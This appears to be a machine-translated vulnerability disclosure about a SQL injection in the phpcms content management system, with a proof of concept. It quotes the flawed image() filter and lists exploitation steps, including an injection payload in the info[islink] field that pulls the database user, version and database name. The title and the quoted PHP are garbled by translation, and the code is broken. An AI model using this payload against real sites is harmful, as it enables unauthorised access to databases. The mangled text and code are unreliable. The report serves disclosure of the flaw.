phpcms latest version SQL injection a gold-bug warning-the black bar safety net

ID MYHACK58:62201456336
Type myhack58
Reporter 佚名
Modified 2014-11-28T00:00:00


Brief description:

phpcms SQL injection(the latest version tested)

Detailed description:

Vulnerability file

code area


function image($field, $value) {

$value = remove_xss(str_replace(array("'",'"','(',')'),",$value));

return trim($value);


The filter is not in quotes, since the GPC of the relationship, and therefore will leave the\, resulting in injection

Exploit proof:

Open submission

  1. First, just submit an article, save the Edit, as shown in Figure

! 1.jpg

  1. ENTER after editing, directly click Save, and then capture the modifications are as follows

! 2.jpg

Modify the info[thumb]: http://site'

Modified info[islink]:

,description=(select concat(user(),0x7c,version(),0x7c,database())) -- s

The final confirmation.

Again to enter the Edit Page, you can see the injection results, as shown in Figure:

! 3.jpg

Vulnerability proof:

! 3.jpg